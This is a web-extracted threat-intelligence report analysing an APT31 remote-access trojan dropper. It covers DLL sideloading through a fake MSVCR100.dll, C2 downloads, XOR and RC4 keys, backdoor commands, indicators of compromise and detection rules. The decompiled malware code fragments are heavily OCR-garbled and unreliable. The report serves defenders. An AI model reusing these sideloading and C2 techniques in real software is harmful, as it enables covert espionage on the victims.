English 


Russian 
Korean 


Support 


English 


Russian 
Korean 


Solutions 
ICS/SCADA 


Critical infrastructure on the frontline 
Protection from targeted attacks (anti-apt) 


ee ee ee. 


Security Compliance 











Turn policies into protection 





Vulnerability Management 
Stop being an easy target 
Utilities 


Industrial-grade cybersecurity 





Financial Services 

Can your security keep up with you? 
ERP Security 

Take control of your ERP security 
View all > 


Products 
MaxPatrol 8 


PT Application Inspector 





Source code analysis tool. 





PT Sandbox 

Advanced sandbox with customizable virtual environments 
MaxPatrol SIEM All-in-One 

Full-featured SIEM for mid-sized IT infrastructures. 
MaxPatrol SIEM 

PT ISIM 

Cyberthreat detection and incident response in ICS. 
XSpider 

Vulnerability scanner. 


PT MultiScanner 





Multilayered protection against malware attacks. 
PT Application Firewall 
Intelligent protection of business applications. 


PT Network Attack Discovery 


NDR system to detect attacks on the perimeter and inside the network. 


MaxPatrol VM 


Privacy - Terms 


View all — 
Services 
ICS/SCADA Security Assessment 


Full Range of ICS-specific Security Services 





Mobile Application Security Services 

Security Analysis and Compliance Audit 
Penetration Testing 

A Comprehensive Approach 

ATM Security Assessments 

Uncover Your Weaknesses 

Custom Application Security Services 
Independent Expert Analysis of Your Source Code 
Forensic Investigation Services 

Prevent Future Incidents 


Web Application Security Services 





Black Box and White Box Analysis 


SSDL Implementation 


Advanced Border Control 
Upgrade Your View of Perimeter Security 


View all — 

Analytics 

Threatscape 

PT ESC Threat Intelligence 
Knowledge base 
Research Blog 

View all — 

Partners 

Authorized Partners 
Distributors 

Technology Partners 
View all — 

About 

Clients 

Press 

News 

Events 

Contacts 

Documents and Materials 
View all — 





Search 


[ 


Menu 


APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and 


Home 
Analytics 
PT ESC Threat Intelligence 


APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and elsewhere 


elsewhere 


Published on 3 August 2021 


Introduction 


( 
‘ Privacy - Terms 


During such monitoring in April 2021, a mailing list with previously unknown malicious content was sent to Mongolia. Some of the files found during the study nau 


rather interesting names ("xascpasit.scr" ["havsralt.scr"] (mong. attachment), "MHdopmauna PO uronHb 2021 roga_ 2021062826109.exe") and, as the study showed, they 
contained a remote access trojan (RAT). Similar attacks were subsequently identified in Russia, Belarus, Canada, and the United States. According to PT ESC threat 
intelligence analysts, from January to July 2021, approximately 10 attacks were carried out using the discovered malware samples. A detailed analysis of malware 
samples, data on the paths on which working directories and registry keys were located, techniques and mechanisms used by the attackers (from the injection of malicious 
code to the logical blocks and structures used) helped correlate this malware with the activity of the APT31 group. 





This group, also known as Judgment Panda (CrowdStrike) and Zirconium (Microsoft), has been active since at least 2016. The group is | ) ) 

Cyberespionage is of key interest. The 
attackers' targets include the government sector, aerospace and defense enterprises, as well as international financial companies and the high-tech sector. In different years, 
the group's victims have included and, it is presumed, ) too. The group also attacked organizations and 
individuals close to U.S. presidential candidates during the 2020 campaign. , Involving the hacking of home and office routers, 
have also been linked with the group. 


In this article, we will study the malware created by the group, focus in more detail on the types of droppers discovered and the tricks used by its developers. We will also 
present the criteria on the basis of which the attacks were attributed. 


Analysis of malicious content 


Dropper 


The main objective of the dropper, the appearance of the main function of which is shown in Figure 1, is the creation of two files on the infected computer: a malicious 
library and an application vulnerable to DLL Sideloading (this application is then launched). Both files are always created over the same path: C:\ProgramData\Apacha. In 
the absence of this directory, it is created and the process 1s restarted. 


strcpy(pSideloadFileName, “ 
FirstFileA = FindFirstFileA(pSideloadFileName, &FindFileData); 
if ({ FirstFileA == [ y-1 ) 
r 
L 
FindClose( ( )@xFFFFFFFF): 
strcpy(pApacheName, " 
vB = FindFirstFileA(pApacheName, &v16); 
if ( v8 == ( y-1) 
FindcClose( ( )@xFFFFFFFF); 
CreateDirectoryA(pApacheName, ©); 


" 
J 
else 
: 
i] 


FindClose(v8) ; 
} 
FileA = CreateFileA(pSideloadFileName, e80u, lu, @, 2u, @xBGu, 8) 
WriteFile(FileA, &pSideloadDlIData, & BU, mberOtByteswWritten, 
CloseHandle( Filed); 
strcpy(v2e, " }: 
vl@ = CreateFileA(v26, 5 » lu, @ : ‘Ou, @): 
WriteFile(v1@, pMaliciousLibrary, @x Gu, fBytesWritten, @); 
CloseHandle(v1@) ; 
GetModuleFileNamew(@, ( )Filename, @x1@4u); 
phToken = @; 
active = WTSGetActiveConsoleSessionid(); 
WTSQueryUserToken(active, &phToken); 
GetModuleFileNameA(®, CmdLine, @x1@4u); 
WinExec(CmdLine, @); 
return 1; 


| 

j 
else 

r 

I 


strcpy( ( NumberOfBytesWritten, 
Thread = @; 


StartupInfo.wShowWindow 
memset (&£Startupinta, i 
ProcessiInformation = 616-4; 
StartupInfo.cb = 68; 
if ( CreateProcessA(pSideloadFileName, @, 6, 4, 6, @, @, @, &StartupInfo, &ProcessInformation) ) 
{ 

FindClose(FirstFileA); 

if ( Thread } 

WaitForSingleObject(Thread, @xFFFFFFFF); 





Figure 1. Overview of the dropper's basic function 


At the second stage, the application launched by the dropper loads the malicious library and calls one of its functions. It is noteworthy that MSVCR100.dll was chosen as 
the name of the malicious library in all cases. A library with an identical name is included in Visual C ++ for Microsoft Visual Studio. It is available on almost all PCs, but 
in a legitimate case it is located in the System32 folder (Figure 2). Moreover, the size of the malicious library is much smaller than the legitimate one. 


ka msver1 00.dll Aata wamenenna: 25.10.2016 19:27 


C:\Windows\System32 Tein: Pacwapenve npHnoxKeHHa Pasmep: 311 Kb 


Figure 2. Parameters of the legitimate MSVCR100.dIl 


It is also worth noting the trick of the malware developers: by way of exports, the library contains names that can be found in the legitimate MSVCR100.dIl. Without a 
doubt, this was done to make the malicious library as identical to the original version as possible. 


Privacy - Terms 


_arge 

| | _ dllonexit 

fil _ set_app_type 

\ | __setusermatherr 
| 7 | __wargv 

il _wgetmainargs 
| es ea 

if | _cexit 

if | _commode 
_configthreadlocale 
_controlfp_s 

fil _crt_debugger_hook 
if | _except_handler4_commeon 
| _exit 

_fmode 

fi _ftimebd_s 

fil _initterm 

i | _initterm_e 

i | _invoke_watson 
| _localtimeb4 

fil _lock 

fil _onexit 

if | _recalloc 

| ee 
_unlock 

fil _wsnwoprintf_s 

if | _wemedln 

if | _wdupenv_s 

if _wfopen_s 
_wputenv 
_wsplitpath_s 
Ea _wstate4i32 


10001010 
10001010 
10001070 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001C 70 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 
10001070 
10001010 
10001010 
10001010 
10001010 
10001010 
10001010 





Figure 3. Part of the exports of malicious MSVCR100.dll 
However, the number of exports in the malicious sample is much smaller, and most of them are ExitProcess calls. 


Below is an example of a call to a malicious function from the created library. After the call, control is transferred to the malicious code. Note that the names of malicious 
functions were most often those used during the regular loading of applications. 


3 int cdecl initterm_e( PIFV *First, PIFV *Last} 
_initterm_e proc near 


First= dword ptr 4 





atext:88E96D62 jmp : imp | initterm e 
_initterm_e endp 
s int  cdecl initterm_e({ PIFV *First, PIFV *Last} 


imp initterm_e dd offset msvcrl@@ initterm_e 





Figure 4. Calling a malicious function inside a legitimate application 


During the analysis of malware samples, PT ESC specialists detected different versions of droppers that contain the same set of functions. The main difference is the name 
of the directory in which the files contained in the dropper will be created. However, in all the instances studied, the directories found in C:\ProgramData\ were used. 


The version of the dropper that downloads all files from the control server is worthy of particular note. Let's take a closer look. At the first stage, the presence of a 
working directory is also checked, after which connection is made to the control server and the necessary data is downloaded from it. 


= FindFirstFileW(L"C:\\ProgramData\\dotixtray", & 
== (HANDLE)-1 ) 


~ FindCLose( (HANDLE )@xFFFFFFFF )3 
return !CreateDirectoryW(L"C:\\ProgramData\\dotixtray", 6); 


FindClosef 


eturn 2; 





Figure 5. Checking for a directory 


Communication with the server is not encrypted in any way, nor is the control server's address inside the malware. Downloaded files are written to the created working 
directory. 


Privacy - Terms 


NumberOtByteshWritten 
FileA = CreateFileA( , Gre 


WriteFile(FileA, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 
CloseHandle(FileA); 
vill = CreateFileA( » &x40 
WriteFile(vll, v28 + 27, v23, &NumberOfByteswWritten, ©); 
CloseHandle(vi11); 

vil? = CreateFileA( 

WriteFile(vl2, v29 + 26, v31, &NumberOfByteswWritten, 
CloseHandle(v12); 

if ( v25 > @ ) 





Figure 6. Creating files in the working directory 


Figure 7 displays the code sections responsible for downloading all files from the server (the last reviewed case), while Figure 8 displays the code for loading the main 
library (first instance). 


HttpOpenRequestA(v3, » szObjectName, » sZReferrer, 4, 
if ( UrlComponents.nScheme == INTERNET SCHEME HTTPS )} 


= HttpOpenRequestA(v3, » szObjectName, , stReferrer, &@ 
Buffer = @; 
dwButferLength = 4; 
InternetQueryOptionA(v9, @xlFu, &Buffer, &dwButferLength) ; 
Buffer |= @x1@@u; 
InternetSetOptionW(v9, @xlFu, &Buffer, 4u) 


( IHttpSendRequestA(v9, 
roto LABEL _15; 
w1l9 = 


if | 


W13u, &v19, &v21, 


wil = 4; 
HttpQueryIntoA(v9, 
vi@ = malloc(Size); 


*vil¥ = v1é; 
*yv13 = Size; 
while { 1 ) 
memset (pReadData, @, sizeot(pReadData 
if ( !InternetReadFile(v9, pReadData, ¢ Qu, &dwiumberOtBytesRead) ) 
breaks: 


'dwiumberOtBytesRead && vill == Size )} 


if (vo ) 
InternetCloseHandle(v9); 
Internett loseHandle(hConnect); 
Internett loseHandle(hInternet); 
return 1; 
} 
memmove @((vll + *v17), pReadData, dwNumberOftBytesRead) ; 





Figure 7. Downloading files from C2 


Privacy - Terms 


HttpOpenRequestA(vl1, » szObjectName, » SzReferrer, ® 


fF ¢ UrlComponents.nScheme == INTERNET_SCHEME_HTTPS 


7 = HttpOpenRequestA(vi, » szObjectName, 
Buffer = @; 
dwButferLength = 4; 


InternetQuer OptionA(v7, @xlFu, &Buffer, &dwhuftferLength); 
Buffer |= @x1@@u; 


InternetSetOptionA(v?, @xlFu, &Butfer, 4 


ce 
» SzkeTerrer, 


| i = 
— ss 3 


' IHttpSendRequestA(v7, @ 
fo LABEL_15; 
a 


4; 
( HttpQueryIntoA(v?7, @13u, ay } 


Oe) } 


vl4 = @; 
wl9 = 4; 
HttpQuerylIntoA(v7, 
hFile = CreateFileA( 
ve = 8; 

( 1 ) 


8, sizeof (pDownloadBufT}); 


CloseHandle(hFile); 


foto LABEL 26; 


'dwiumberOtBytesRead && ve == v14 ) 
break; 
vG = hFile; 
vB += dwiNumberOfBytesRead ; 


if { 

I 

L 
CloseHandle(v9); 

ABEL_28: 
if ( wi } 
InternetCloseHandle(w7); 

InternetC LoseHandle(hConnect) ; 
InternetCloseHandle(hInternet) ; 


return @; 


Figure 8. Downloading a malicious library from C2 


Examining the open directories of control servers revealed unencrypted libraries (Figure 9). 


Index of /download 





Name Last modified Size Description 
o Parent Directory af 
image9588 jpop 2021-03-24 10:27 366K 
) update.dll 2021-03-24 06:32 366K 





Apache/?2.4.29 (Ubuntu) Server at www flushedn.com Port 443 


Figure 9. Encrypted and unencrypted libraries on the server 


'WriteFile(hFile, pDownloadBuff, dwNumberOfBytesRead, &NumberOfBytesWritten, @) 





It is also worth noting that in some cases, particularly during attacks on Mongolia, the dropper was signed with a valid digital signature (Figure 10). PT ESC experts 


believe that this signature was most likely stolen. 


Privacy - Terms 





Digital Signature Details ? ~*~ 


General Advanced 





=, Digital Signature Information 
this digital signature is OK. 


Signer information 








Name: 
E-mail: michael @softwareconcepts.nz 
signing time: Monday, April 19, 2021 11:20:28 AM 
View Certificate 
Countersignatures 


Name of signer: E-mail address: Timestamp 


DigiCert Timesta... Not available Monday, April 19, 20... 





Details 


Figure 10. Valid digital signature of a dropper 
Malicious library 


Execution commences with receipt of a list of launched processes. That said, this has no impact on anything and is not used anywhere. The library then checks for the 
presence of the file C:\\ProgramData\\Apacha\\ssvagent.dll. This is the encrypted main load downloaded from the server. If this file does not exist, then the address of the 
control server from which the download will be performed is decrypted. 


In fact, this is a 5-byte XOR with a key built into the library. Inside the binary file, the key is stored in the form xmmword with the constant 
9000000090000000900000009h (the fifth byte is added to the memory by the malware itself using the direct address). In fact, encryption is performed with byte 0x9. 
After decrypting the C2 address, it connects to the control server and downloads the encrypted payload from it. Then the received data is saved in the file 
C:\\ProgramData\\Apacha\\ssvagent.dll, and the legitimate application ssvagent.exe is restarted. The main part of the described functions is presented in Figure 11. 


ncrypted[ 
ncrypted | 


Le zy 


1 J J 1 
ee 
Mmreya Pi Mm 


* (&pUrlEncrypted[ 
* (&pUrlEncrypted[ 


!fnPayloadDownload(}) 3} 


Leet | 





| 


Figure 11. Decrypting the C2 address, loading and launching a new instance of ssvagent.exe 


If the payload has been loaded earlier, it is checked for an application that is already running. To do this, a mutex named ssvagent is created; if it has been created, the 
application ends. 


The library then writes the legitimate ssvagent.exe to startup via the registry, as shown in Figure 12. 


Privacy - Terms 





Figure 12. Persistence via registry key 


After this, the file downloaded from the server is decrypted using a XOR operation with a 5-byte key. (The algorithm and key shown in Figure 10 differ from those used 
when decrypting the address of the control server.) Just as when decrypting the address of the control server, the key is stored in the form xmmword and is a constant: 
1100000033000000060000000Eh. The fifth byte is identical in all cases; its value is 0x12. 


fnLoadBinaryInMem(v5, Vs 


Figure 13. Decryption code of the main library 


After this, the decrypted data is placed in the application memory, and control is transferred to it. 
Payload 


The main library starts its execution by creating a package that will be sent to the server. Officially, the package is created from three parts: 


1. Main heading 
2. Hash 
3. Encrypted data 


The main heading has the following structure: 


typedef struct _MAIN_HEADER 


af 

DWORD sizeOfPacket;//excluding the field itself 
DWORD const_1; 

DWORD const_2; 

} MAIN_HEADER, *PMAIN_ HEADER; 


The values of const_1 and const_2 are identical and remain unchanged from package to package (unit value equalized to 4 bytes value). 


To generate a hash, which is preceded by the main heading, the malware obtains the MAC address and PC name (the result of executing GetComputerNameExW). These 
values are concatenated (without using any separators), after which an MDS hash is taken from the resulting value, which is then converted into a string. An example of 
hash generation is presented in Figure 14. 


b/Se/0dd/ala46clfbe4d3ee¢e/3d9c959 
Figure 14. Example of hash generation 





The third part of the package 1s then formed. The structure describing it is presented below: 


typedef struct _FIRST PACKET 


char pcName[]; //result of GetComputerNameExwW 
BYTE splitByte_0x@9; 
char userName[]; // result of GetUserNameW Privacy - Terms 


BYTE splitByte_0x@9; 

char hostIp[ ]; 

BYTE splitByte_0x@9; 

char decrStr_1[2]; 

BYTE splitByte_0x2E; 

char decrStr_2[1]; 

BYTE splitByte_0x2E; 

char decrStr_3[5]; 

BYTE splitByte_0x2E; 

char decrStr_4[2]; 

BYTE splitByte_0x2E; 

char osVersion_inverted[2]; 
BYTE splitByte_0x@9; 

char version[ 3]; 

BYTE splitByte_0x@9; 

char macAddr|[ ]; 

BYTE splitByte_0x@9; 

} _FIRST_PACKET, * FIRST _PACKET; 


Each field is separated from the other by a value of 0x09; some fields are separated by a value of 0x2E. 


Ce Os HS G4 65 86 @F 86 89 84 OB OC 8D GE OF 
: 2 45 f 


9.10.0. 177% 
: , O1.1.0. 00-FF-Cy- 
ease 7D-C6-DB 





Figure 15. An example of a generated package 


Heading fields decrStr_1 through decrStr_4 are not generated by the malware and are not collected on the infected computer. All values are encrypted inside the malware. 
Each value is decrypted separately and is added to the heading. The decrStr_4 field depends on the bitness of the operating system, which ultimately leads to different 
offsets of the encrypted data transferred to the decryption function (Figure 17) as an argument. 


The format of a complete generated package is presented below. The main heading is highlighted in green; the hash, in red; the encrypted data, in yellow. 


C0 a WF 88 09 64 8B Oc OD & 
a4 42 37 


oA Hr LE 7 if , ED [pie IDE 


p FS fo Age 87 BD ZC Be Be 
4 4E OF? De i 46 8 
4 AD Be rac oy Ba 7 o8 ED : 


4 oo 6 





Figure 16. Encrypted package with all headings 


init_string({ 





Figure 17. Decrypting data from a specific position within a binary file 


The generated package is encrypted with RC-4 with the key 0x16CCA8I1F, which is embedded in the encrypted data and sent to the server. After this, malware waits for 
commands from the server. 


Let's take a look at the list of commands that the malware implements: 


e (x3: get information on mapped drives. 
e (x4: perform file search. Privacy - Terms 


e Ox5: create a process, communication through the pipe. 

e (xA: create a process via ShellExecute. 

e (0xC: create a new stream with a file download from the server. 

e 0x6, 0x7, 0x8, 0x9 (identical): search for a file or perform the necessary operation via SHFileOperationW (copy file, move file, rename file, delete file). 
e OxB: create a directory. 

e (xD: create a new stream, sending the file to the server. 

e 0x11: self-delete. 


It is noteworthy that some of them duplicate each other's functions, and some are identical in terms of code implementation. This is most likely connected with the fact 
that the potential malware version is 1.0. This assumption is based on the value embedded in the code and contained in the network packages. 


The code for processing the last command is particularly intriguing: all the created files and registry keys are deleted using a bat-file. 


og og 


I 

i! 

in 
“in 


o> og oO 





Figure 18. Code for removing all components 


Attribution 


During their investigation, PT ESC specialists found a Secureworks report describing the APT31 DropboxAES RAT trojan. Analysis of the detected malware instances 
allows us to assert that the group is also behind the attack we studied. Numerous overlaps were found in functionality, techniques and mechanisms used, starting with the 
injection of malicious code (up to the names of the libraries used) and ending with logical blocks and structures used inside the program code. The paths along which the 
malware working directories are located and the registry keys through which the persistence mechanism and their identity to the working directories are provided are also 
identical. In addition, the command handlers executed by the malware proved to be extremely similar, while the self-delete mechanism is identical. 


The main difference between this version of the malware and that reviewed by Secureworks lies in the communication of the main load with the control server. In the 
cases studied, there was a custom communication protocol that Dropbox does not use to exchange data. 


Network infrastructure 


The detected malware samples, including the encrypted ones, revealed no overlaps between them in the network infrastructure. Nevertheless, in several cases, the payload 
accessed nodes other than those from which it was downloaded. 


Privacy - Terms 





con 


O02deMG82Iad8d3de2Ibch5ed Iboetd895d/5 73ed3d89e082 124 3aaIb7bb4ad 213,183.56. ' 
ZafidebbaadflctabdeSede (0d 78565ehech2c73 1c5tel 582ecdfdeOSb0ec Sha-256 
Sha-256 





213.183.56.0 
al 





213,183.56, 146 


/ 





10 | inst.rsnet-devel.com 


api. flushedn.com 







334136069d7 c3a030b2e0738a5ee80d442deelaz02f6937 12 fateS2a7 7 Stead 
Sha-256 


retbilrag.com | 








efdbb 19'b65bcf5 
abuse@registrar.eu 


Sha-256 
116.202 251.34 
ap.hostupoeulcom ¥ a 
mnieeank nian 679955fi2a97ea1 1a18 laeb0c?75etf/ Btadd76: 


sha-256 





185.144.317.191 hostupoeul.com giteloudeache.com . 









j = 
2@b495829b8b33 19f8e2 273 5d /bd4icddea 1 bSbafe tl oda 


Sha-256 edgecloudc.com 1.255. 164.56 


188.130.160.136 


138.201.79.102 72.21.81.240 


Figure 19. Identified servers 


In one of the latest malware samples, an interesting domain inst.rsnet-devel[.|com was identified, which imitates the domain of federal government bodies and 
government bodies of constituent entities of the Russian Federation for a segment of the Internet. This might indicate an attack on government organizations in the 
Russian Federation. 


Authors: Denis Kuvshinov, Daniil Koloskov, PT ESC 


Conclusion 


In the study PT ESC specialists analyzed new versions of the malware used by APT31 in attacks from January to July this year. The revealed similarities with earlier 
versions of malicious samples described by researchers, such as in 2020, suggest that the group is expanding the geography of its interests to countries where its growing 
activity can be detected, Russia in particular. We believe that further instances will be revealed soon of this group being used in attacks, including against Russia, along 
with other tools that might be identified by code correspondence or network infrastructure. 


IOCs 

File MDS5 SHA-1 SHA-256 

Dropper 

jconsole.exe 3f5ea95a5076b473cf8218170e820784 765bd2fd32318a4cb9e4658194fe0fb5d94568e0 33f136069d7c3a03 0b2¢ 
- db1673ale8316287cb940725bb6caa68 6a358afdd2c59f0bbfc7b1982ae6b0a782399923 2affdebbaa4f0cfab64eSc: 
- 2798b66475cf0794e9b868d6S56defca7 0c3e0a5553cc29049fd8cS5fc3alaf3ae6c0c298e 002dc9f6823ad8d3de2- 
- 626270d5bf1 6eb2c4dda2d9f6e0c4ef9 £585917fdb89b9dc849621676376b0b1e6b348fa 2b495829b8b33 1 9f98e2 
news.exe 56450799fe4e44d7cSaff84d173760e8 10037b4533df13983a75d74dcea32dc73665700c 679955ff2a97eallal81. 
- d919fed03ec53654be59e15525c1448f Idb9fe7b04bcS5b2fc10f78da3891leb30c19a48b6 efdbb19fb65bcfS5c4a8fe 
XABCpaliT.Scr d22670ab9b 1 3de79e442 100f56985032 6e7540fa001 fc992d2050b97eal 7686d34863740 78cc364e761701455bd 
president_email.exe 8e744f7b07484afct87c454c6292e944 da845d8219d3315c02f84c27094965d02cdaa76c 5d0872d07c6837dbc3b 


VUndopmauua PO wronb 2021 roga_2021062826109.exe 49bca397674f67e4c069068b596cab3e d13d6d683855f5a547b96b6e2365c6f49a899d62 874b946b6747 15c580e 





Malicious library 


MSVCR100.dll Scefaal46178f5c3a297a7895cd3dlfe 81779c94dbe2887ff1 ff0fd4cl5ee0c373bd0b40 c15a475f8324fdfcd959: 
MSVCRI100.dll 326024bc9222ebec281lecS53ca5598cc!l S5c25b93ebcedafcff0c85bcde2a0857ca72dc73e 0229404a1 4 
MSVCRI1O00.dll 6f3047277719e2351cel4a54a39f7b15 7de335e005b0766268df9 1 8e7e3b64f4b3521cle 640128a35el 


Privacy - Terms 


Network indicators 


gitcloudcache[.]com 
edgecloudc[.]com 
api[.|hostupoeui[.]com 
api[.]flushcdn[.]com 
const[.]be-government[.]com 
drmtake[. |tk 

inst[. }rsnet-devel[.]com 
20[.]11[.J11[.]67 


Network signature 


As a result of researching the format of the complete generated packet, Positive Technologies experts managed to develop rules for detecting this threat in network traffic. 
You can download the free redistributable rules from our repository at https://github.com/ptresearch/AttackDetection/tree/master/APT31 


MITRE 


ID Name 
Resource Development 


T1587.001 Malware 
T1587.002 Develop Capabilities: Code Signing Certificates 


Initial Access 
T1566 Phishing 
Execution 


T1204.002 User Execution: Malicious File 


Description 


APT31 develops malware and malware components that can be used during targeting 
APT31 uses code signing to sign their malware and tools 


APT31 sends phishing messages to gain access to victim systems 


APT31 relies upon a user open a malicious file to get it executed 


T1059.003 Command and Scripting Interpreter: Windows Command Shell APT31 uses the Windows command shell for command execution 


T1106 Native API 


Persistence 


Seoenrnen Startup Folder 


T1574 Hiyack Execution Flow: DLL Search Order Hijacking 


Defense Evasion 


T1036 Masquerading 

T1140 Deobfuscate/Decode Files or Information 
T1027 Obfuscated Files or Information 

T1112 Modify Registry 


Discovery 

T1082 System Information Discovery 
Collection 

T1005 Data from Local System 
Command and Control 


T1001 Data Obfuscation 

Wis2! Standard Cryptographic Protocol 

T1043 Commonly Used Port 

T1071.001 Application Layer Protocol: Web Protocols 


Exfiltration 


T1020 Automated Exfiltration 
T1041 Exfiltration Over C2 Channel 


Boot or Logon Autostart Execution: Registry Run Keys / 


APT31 directly interacts with the native OS application programming interface (API) to 
execute behaviors 


APT31 achieves persistence by adding a program to a Registry run key 


APT31 executes their own malicious payloads by hijacking the way operating systems run 
programs 


APT31 manipulates features of their artifacts to make them appear legitimate to users 
APT31 uses mechanisms to decode or deobfuscate information 

APT31 uses encryption to make it difficult to detect or analyze an executable file 
APT31 APT31 team uses the Windows registry for persistence 


APT31 obtains detailed information about the operating system 


APT31 uses backdoor functionality to exfiltrate any file on the infected machine 


APT31 obfuscates command and control traffic to make it more difficult to detect 
APT31 uses data hiding in C&C with RC4 

APT31 uses ports 80 and 443 for communication 

APT31 uses HTTP and HTTPS protocols to communicate with control servers 


APT31 uses automatic exfiltration of stolen files 
APT31 uses C&C channel to exfiltrate data Pavano Taine 


Related articles 


e April 12, 2021 PaaS, or how hackers evade antivirus software 
e April 27, 2021 Lazarus Group Recruitment: Threat Hunters vs Head Hunters 





WHAT ARE THE SECURITY 
THREATS ON YOUR NETWORK? 


Check your traffic—for free 


REQUEST PILOT 





Share: 


Related articles 
April 27, 2021 


Lazarus Group Recruitment: Threat Hunters vs Head Hunters 
September 29, 2020 

ShadowPad: new activity from the Winnti group 
April 12, 2021 

PaaS, or how hackers evade antivirus software 


All articles 
Solutions 


ICS/SCADA 

Vulnerability Management 

Financial Services 

Protection from targeted attacks (anti-apt) 
Utilities 

ERP Security 

Security Compliance 


Products 


MaxPatrol 8 

MaxPatrol SIEM 

PT Application Firewall 

PT Application Inspector 
PT ISIM 

PT Network Attack Discovery 
PT Sandbox 

XSpider 

MaxPatrol VM 

MaxPatrol SIEM All-in-One 
PT MultiScanner 





Services 


ICS/SCADA Security Assessment 
ATM Security Assessments 

Web Application Security Services 
Mobile Application Security Services 
Custom Application Security Services 


Privacy - Terms 


SSDL Implementation 
Penetration Testing 

Forensic Investigation Services 
Advanced Border Control 


Analytics 


Threatscape 

PT ESC Threat Intelligence 
Knowledge base 
Research Blog 





Partners 


e Authorized Partners 
e Distributors 
e Technology Partners 


About 


Clients 

Press 

News 

Events 

Contacts 

Documents and Materials 


Copyright © 2002-2021 Positive Technologies 
Find us: 


Terms of Use 

Privacy Notice 

Cookie Notice 

Positive Coordinated Vulnerability Disclosure Policy 
Sitemap 


Copyright © 2002-2021 Positive Technologies 


Terms of Use 

Privacy Notice 

Cookie Notice 

Positive Coordinated Vulnerability Disclosure Policy 
Sitemap 


Privacy - Terms 


